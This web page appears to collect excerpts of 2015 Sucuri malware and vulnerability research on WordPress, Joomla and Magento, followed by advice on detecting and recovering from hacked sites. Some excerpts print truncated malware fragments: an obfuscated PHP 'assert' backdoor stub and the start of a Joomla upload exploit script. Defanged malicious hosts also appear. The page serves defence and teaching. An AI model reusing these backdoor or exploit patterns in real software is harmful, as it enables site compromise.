HomeLatest WordPress security threats
Latest WordPress security threats
This page brings together recent WordPress security research and attack reports from Wordfence, Patchstack, Sucuri and WPScan. We summarise the headlines and link to the original vendor research so you can read the source in full.
1,879 reports kept since 2009. Updated automatically every 10 minutes. Last checked 13 min ago.
- Pseudo-Darkleech in Drupal
Research Sucuri, 28 Dec 2015
It’s just a minor update about the “pseudo-darkleech” malware we’ve been following for about a year now. We wrote that it can be usually located inside the wp-includes/nav-menu.php file in WordPress and in the includes/defines.php files ...
- Using WPScan: Finding WordPress Vulnerabilities
Research Sucuri, 23 Dec 2015
When using WPScan you can scan your WordPress website for known vulnerabilities within the core version, plugins, and themes. You can also find out if any weak passwords, users, and security configuration issues are present. The database...
- File Modification Date - not the Best Compromise Signal
Research Sucuri, 18 Dec 2015
Some webmasters only check recently modified files when searching for malware. It may work sometimes, but many infections don’t change files’ time-stamps. There is the “touch” PHP function that allows to set whatever modification time to...
- Critical 0-day Remote Command Execution Vulnerability in Joomla
Research Sucuri, 14 Dec 2015
Nov 2016 Update: If you need to clean your hacked Joomla site, we have released a new free guide to show you how to identify and remove hacks. Read the Guide! The Joomla security team have just released a new version of Joomla to patch a...
- Website Malware - Evolution of Pseudo Darkleech
Research Sucuri, 12 Dec 2015
Last March we described a WordPress attack that was responsible for hidden iframe injections that resembled Darkleech injections: declarations of styles with random names and coordinates, iframes with No-IP host names, and random dimensi...
- CACHE START Russian Spam
Research Sucuri, 10 Dec 2015
We see quite a few sites with the following injected PHP code: //###=CACHE START=### error_reporting(0); $strings = "as";$strings .= "sert"; @$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXF...skipped...Tyvqwg9"));')); //##...
- Obfuscated Links in the Captcha on Login WordPress Plugin
Research Sucuri, 24 Nov 2015
Do you remember SweetCAPTCHA that tried to monetize its WordPress plugin injecting unwanted ads into web pages? Today we’ve found another CAPTCHA plugin with a suspicious code. We cleaned a site and our scanner reported a suspicious obfu...
- 404 Errors in Search Console - SEO Spam
Research Sucuri, 18 Nov 2015
Every once in a while we get a glimpse into rare and strange behavior that doesn’t involve the website being hacked, but causes major problems for website owners. We have spoken recently about malicious referral spam in Google Analytics ...
- New Wave of g00 Script Injections
Research Sucuri, 16 Nov 2015
Once active during the past summer, the g00[.]co script injections come with a new wave on infections this November. The most common variation is This short URL hides the hxxp://yourjavascript[.]com/3921156982/not.js script, which in tur...
- Distributed Vulnerability Search - Told via Access Logs
Research Sucuri, 11 Nov 2015
Sometimes just a few lines of access logs can tell a whole story… Many ongoing attacks against WordPress and Joomla sites use a collection of known vulnerabilities in many different plugins, themes and components. This helps hackers maxi...
- jQuery.min.php Malware Affects Thousands of Websites
Research Sucuri, 6 Nov 2015
Nov 2016 Update: If your Joomla or WordPress website is infected, check out our new, free, DIY guides to clean your site and prevent reinfection. Read the Joomla Guide Read the WordPress Guide Fake jQuery injections have been popular amo...
- Return of the EXIF PHP Joomla Backdoor
Research Sucuri, 3 Nov 2015
Our Remediation and Research teams are in constant communication and collaboration. It’s how we stay ahead of the latest threats, but it also presents an opportunity to identify interesting threats that aren’t new but may be reoccuring. ...
- WPScan Intro: WordPress Vulnerability Scanner
Research Sucuri, 29 Oct 2015
Have you ever wanted to run security tests on your WordPress website to see if it could be easily hacked? WPScan is a black box vulnerability scanner for WordPress sponsored by Sucuri and maintained by the WPScan Team, available free for...
- Joomla SQL Injection Attacks in the Wild
Research Sucuri, 26 Oct 2015
Nov 2016 Update: We released a new free guide to help you identify and remove Joomla hacks. Read the Guide! Last week, the Joomla team released an update to patch a serious vulnerability on Joomla 3.x. This vulnerability is an SQL inject...
- Massive Magento Guruincsite Infection
Research Sucuri, 19 Oct 2015
We are currently seeing a massive attack on Magento sites where hackers inject malicious scripts that create iframes from “ guruincsite[.]com “. Google already blacklisted about seven thousand sites because of this malware. There are two...
- Security Advisory: Stored XSS in Akismet WordPress Plugin
Research Sucuri, 15 Oct 2015
During a routine audit for our WAF, we discovered a critical stored XSS vulnerability affecting Akismet, a popular WordPress plugin deployed by millions of installs. Vulnerability Disclosure Timeline: October 2nd, 2015 - Bug discovered, ...
- Redirect to Microsoft Word Macro Virus
Research Sucuri, 13 Oct 2015
These days we rarely see Microsoft Word malware on websites, but it still exists and compromised websites can distribute this kind of malware as well. It’s not just email attachments when it comes to sharing infected documents. For examp...
- vBulletin Still Redirecting to Myfilestore.com
Research Sucuri, 13 Oct 2015
MyFileStore[.]com redirects from vBulletin sites have been a problem since 2011. It is associated with the VBSEO plugin with multiple unpatched vulnerabilities that has been discontinued for more than 3 year now. You can find more inform...
- Brute Force Amplification Attacks Against WordPress XMLRPC
Research Sucuri, 9 Oct 2015
Brute force attacks are one of the oldest and most common types of attacks that we still see on the Internet today. If you have a server online, it’s most likely being hit right now. It could be via protocols like SSH or FTP, and if it’s...
- Magento Malware Emails Stolen Credit Card Details to Hackers
Research Sucuri, 9 Oct 2015
We regularly find malware that tries to steal client credit card details from Magento sites. Hackers use a few tricks and slightly modify their code from time to time. For example, we’ve seen multiple modifications of the code reported i...
- Malware in comments
Research Sucuri, 5 Oct 2015
There are many tricks to hide malicious code. One of them is placing it to the part of legitimate files where people don’t normally expect to see executable code so they don’t skip such places during manual reviews. Comment blocks are on...
- Security Advisory: Stored XSS in Jetpack
Research Sucuri, 2 Oct 2015
During a routine audit for our WAF, we discovered a critical stored XSS affecting the Jetpack WordPress plugin, one of the most popular plugins in the WordPress ecosystem. Vulnerability Disclosure Timeline: September 10th, 2015 - Initial...
- FormCraft v1.4.6 under attack
Research Sucuri, 1 Oct 2015
As we clean many sites infected by the VisitorTracker malware, we see vulnerabilities in multiple plugins being exploited by attackers. For example, my colleagues John Castro and Marc-Alexandre Montpas analyzed many sites where hackers e...
- WordPress Malware - VisitorTracker Campaign Update
Research Sucuri, 30 Sep 2015
For the last 3 weeks we have been tracking a malware campaign that has been compromising thousands of WordPress sites with the VisitorTracker malware code. We initially posted some details about this issue on this blog post: WordPress Ma...
- Analyzing Black Hat URL Shorteners
Research Sucuri, 29 Sep 2015
Hackers are known to use URL shortening services to obfuscate their real landing pages. It’s very effective in clickbait scams on social networks. Some hackers think that using URL shorteners in site injections makes it less likely to be...
- Minimalistic WordPress injection
Research Sucuri, 23 Sep 2015
WordPress-specific malware is slightly different than generic PHP malware. Inside WordPress files, it can use WordPress API and WordPress database. This allows to create this kind of injections: It was found in WordPress theme files. The...
- .htaccess Tricks in Global.asa Files
Research Sucuri, 22 Sep 2015
As you might know a lot of hacks use Apache configuration .htaccess files to override default web site behavior: add conditional redirects, create virtual paths (e.g mod_rewrite), auto-append code to PHP scripts, etc. In the world of IIS...
- WordPress Malware - Active VisitorTracker Campaign
Research Sucuri, 18 Sep 2015
We are seeing a large number of WordPress sites compromised with the “visitorTracker_isMob” malware code. This campaign started 15 days ago, but only in the last few days have we started to see it gain traction; really affecting a large ...
- WordPress Brute Force Attacks - 2015 Threat Landscape
Research Sucuri, 16 Sep 2015
One of the first server-level compromises I had to deal with in my life was around 15 years ago, and it was caused by an SSH brute force attack. A co-worker set up a test server and chose a very weak root password. A few days later, the ...
- Magento script stealing credit card details
Research Sucuri, 14 Sep 2015
We recently found another malicious script used to steal credit cards that appears to be injected into compromised websites running Magento, it appears to be sending the information to payment.authorize.ga which is a recently registered ...
- Malicious Google Search Console Verifications
Research Sucuri, 8 Sep 2015
This past summer we noticed a trend of more and more Blackhat SEO hacks trying to verify additional accounts as owners of compromised sites in Google Search Console (formerly Webmaster Tools). Google Search Console provides really useful...
- Hacked Sites Help Hack Third-Party Sites
Research Sucuri, 8 Sep 2015
Just a reminder that your hacked site may be used to anonymously hack third-party sites. This Joomla com_Myblog exploit script was found on one hacked site: $uploadfile="tq.php.jpg"; $ch = curl_init("http:// /index.php?option=com_myblog&...
- visitorTracker spam-seo injector wave corrupts sites
Research Sucuri, 7 Sep 2015
Recently, we\’re seeing an increasing visitorTracker malware wave. Moreover, there are lot of corrupted infections out there, breaking the infected sites. Right now, the malicious code starts and ends with visitorTracker comment tag and ...
- Secondtds.mooo[.]com .htaccess redirects
Research Sucuri, 2 Sep 2015
We are finding many sites infected with malicious redirects inside the .htaccess file, to secondtds.mooo[.]com/go.php?sid=3 . That domain is a TDS (traffic controller) which redirects visitors to another website pushing your browser to d...
- Understanding File and Folder Permissions for Better Website Security
Research Sucuri, 1 Sep 2015
Website security begins on the server, not with a plugin. Every page and configuration file is stored on disk, and the operating system controls who can read, change, or run them. These controls are called file and folder permissions . Y...
- GCCanada.com Malware
Research Sucuri, 1 Sep 2015
We are seeing a large amount of sites with a malscript from gccanada.com injected into them. The malware redirects visitors to searchmagnified.com, which redirects them to freeresultsguide.com.That\’s the code being added to the hacked s...
- Tag-cloud-generator com script redirects to parked domains
Research Sucuri, 31 Aug 2015
Today we found a few websites that loaded strange code from tag-cloud-generator[.]com. Sites tried load several image and font files from this site, but they all returned 404 Not Found. The only live file that they loaded was hxxp://www....
- Fake Social Share WordPress Plugin Creates Pharma Spam Doorways
Research Sucuri, 26 Aug 2015
We found infected sites where malware created a fake WordPress plugin that generated pharma spam doorways. Path: wp-content/plugins/social-share/wp-social-share.php This file creates wp-content/plugins/social-share/share.php that calls i...
- FunWebProducts UserAgent Bloating Traffic
Research Sucuri, 25 Aug 2015
Every once in a while we get a case that makes us dig deep to find answers. We have spoken before about the trouble with forensics and reasons why websites get hacked. Sometimes though, the answer is not clear and we can only gather clue...
- Wigo Means Bingo for Blackseo Agent
Research Sucuri, 18 Aug 2015
This week my colleague Peter Gramantik showed me a few infected sites that had very similar code embedded in the WordPress index.php files: if (eregi('- dbst ',$_SERVER['REQUEST_URI'])) { error_reporting(0); include (' license.txt '); ex...
- Persistent XSS Vulnerability in WordPress Explained
Research Sucuri, 12 Aug 2015
Last week the WordPress team released a patch that fixed 6 security vulnerabilities. Of the six, you’ll find one that we identified a few months back. Vulnerability Disclosure Timeline: May 6th, 2015 - Initial report to WordPress securit...
- Ask Sucuri: How Did My WordPress Website Get Hacked? - A Tutorial
Research Sucuri, 7 Aug 2015
With the proliferation of Infrastructure and Platform as a Service providers, it is no surprise that a majority of today’s websites are hosting in the proverbial cloud . This is great because it allows organizations and individuals alike...
- WP-CLI Guide: Install WordPress via SSH
Research Sucuri, 4 Aug 2015
This is our fourth post on using WP-CLI to manage WordPress securely over SSH. In our first post we showed you how to connect to WordPress over SSH. The second post had you typing a few commands to backup and update the WordPress core an...
- WP-CLI Guide: Secure Plugin & Theme Management
Research Sucuri, 28 Jul 2015
Welcome to our third post on WP-CLI for secure WordPress management over an SSH command line interface. In our previous two articles, we discussed how to connect to WordPress over SSH, and then how to back up & update WordPress securely....
- SweetCAPTCHA Returns Hijacking Another Plugin
Research Sucuri, 23 Jul 2015
Yesterday we observed a strange short return of the SweetCaptcha plugin to WordPress.org repository. In June we reported that SweetCaptcha injected third-party ad code to their scripts which lead to malvertising problems on the sites tha...
- WP-CLI Guide: Secure WordPress Backup and Update
Research Sucuri, 21 Jul 2015
Welcome to our second post in the series on WP-CLI for WordPress management over SSH. In our previous post, we discussed how to get your SSH credentials and use WP-CLI to connect to your website over the command line. Before we get into ...
- Webutation Distributing Malware Through Safety Badge
Research Sucuri, 16 Jul 2015
If you are using the Webutation badge on your site, remove it now. It appears they got hacked and are distributing malware to mobile devices through redirects hidden within the badge’s code. We were analyzing a website that was compromis...
- WP-CLI Guide: Connect to WordPress via SSH Intro
Research Sucuri, 14 Jul 2015
Do you use the WordPress dashboard to update plugins and themes? How do you back up your database? If you have not used it yet, WP-CLI is an efficient way to manage your WordPress installation using a command line interface, meaning you ...
- Common Website Security Terminology Defined
Research Sucuri, 7 Jul 2015
If you want to keep your website safe, it is important to understand the website security terminology used to describe the causes and effects of hacks. Software vulnerabilities and access control issues are two of the main causes of webs...
- Analyzing a Facebook Clickbait Worm
Research Sucuri, 30 Jun 2015
Here at Sucuri we suspect everything, especially when your friends start to share content written in another language with clickbait headlines. Malicious Facebook posts are one way that hackers can use social engineering to attract and a...
Common types of WordPress compromise
WordPress compromises do not all look the same. Some are obvious to visitors, while others are designed to remain unnoticed. A site may start sending visitors to an unrelated domain, display pages or links that the owner never created, or contain a backdoor that allows an attacker to return after the visible problem has been removed.
Other compromises can involve rogue administrator accounts or fake plugins placed in the WordPress installation to blend in with legitimate software. On WooCommerce sites, malicious code may target the checkout process or other pages that handle customer data. The presence of unfamiliar code is not enough on its own to identify what happened, so the investigation needs to establish what changed, when it changed and how the attacker gained access.
Outdated components are one possible route, but compromised passwords, exposed hosting credentials and other weaknesses can also matter. WordPress recommends keeping software current, using strong passwords, controlling file permissions and maintaining reliable backups as part of normal hardening.
Signs your WordPress site may be hacked
Unexpected redirects are a common warning sign, particularly when they appear only on certain devices, browsers or traffic sources. Other clues include unfamiliar administrator users, pages you did not publish, altered titles or search snippets, unexplained file changes, new scheduled tasks, or security warnings in Google Search Console.
Performance problems can also justify investigation, but a slow site does not automatically mean malware. The same applies to unusual server load or email activity. Treat these as signals to inspect logs, files, users and recent changes rather than proof of a specific infection.
Google recommends using the Security Issues report in Search Console when hacked content or malware is suspected. A simple site search can also reveal indexed pages that do not belong to you. If you find something unexpected, record it before making changes so you have evidence to compare during cleanup.
What to do first if you think your WordPress site is hacked
Do not begin by deleting every suspicious file you can see. First take a copy of the affected site and database, note the time the problem was found and preserve relevant logs where available. This gives you something to examine if the visible symptoms return or if you need to identify the original entry point.
Change passwords for WordPress administrators, hosting, SFTP or FTP, the database and other privileged services that could have been exposed. Review all administrator accounts and remove access you do not recognise. Then decide whether the safest recovery route is a clean restoration from a known good backup or a controlled malware cleanup.
The job is not finished when the unwanted page or redirect disappears. Check themes, plugins, WordPress core, configuration files and scheduled tasks for persistence, update vulnerable components and close the route that allowed access. If Google has flagged the site, follow its hacked site guidance and request review only after the site has been cleaned. Our WordPress malware removal page explains the recovery service. Hacked Site Rescue is £249 fixed price.
Common questions
Answers to the questions we hear most about this.
How can I tell if my WordPress site has malware?
Look for unexpected redirects, unfamiliar administrator accounts, pages or links you did not create, unexplained file changes and security warnings in Google Search Console. None of these signs identifies the cause by itself, so the site still needs investigation.
Should I delete suspicious files straight away?
Not necessarily. Take a copy of the site and database first and preserve useful logs where possible. Deleting visible files before recording the incident can remove evidence without closing the route used to gain access.
Can restoring a backup fix a hacked WordPress site?
A clean backup can be an effective recovery route if it predates the compromise, but you still need to identify and fix the entry point. Otherwise the same weakness can remain after the restore.
What should I change after a WordPress hack?
Change privileged passwords, review administrator users, update vulnerable software and inspect the site for persistence such as backdoors or altered scheduled tasks. The exact steps depend on how the compromise occurred.
Think your website has been hacked?
Call us or send the details. Hacked Site Rescue is a fixed £249, and we find how the attacker got in.